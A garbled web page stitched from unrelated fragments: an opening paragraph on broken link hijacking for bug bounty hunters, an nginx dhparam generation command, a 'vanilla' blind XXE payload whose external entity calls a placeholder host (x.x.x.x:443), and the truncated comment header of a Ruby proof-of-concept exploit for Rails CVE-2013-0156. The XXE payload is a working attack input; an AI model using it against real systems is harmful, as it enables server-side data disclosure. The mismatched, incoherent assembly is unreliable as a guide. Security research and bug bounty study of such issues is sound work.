Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link Hijacking comes in two forms, reflected and stored. This issue has been exploited in the wild numerous times, but surprisingly few researchers actively look for broken links in bug bounty programs.
This post aims to give you a basic overview of the different issues that could possibly arise if a target links to an expired endpoint.
| # to generate your dhparam.pem file, run in the terminal | |
| openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048 |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| #!/usr/bin/env ruby | |
| # | |
| # Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
| # | |
| # ## Advisory | |
| # | |
| # https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
| # | |
| # ## Caveats | |
| # |
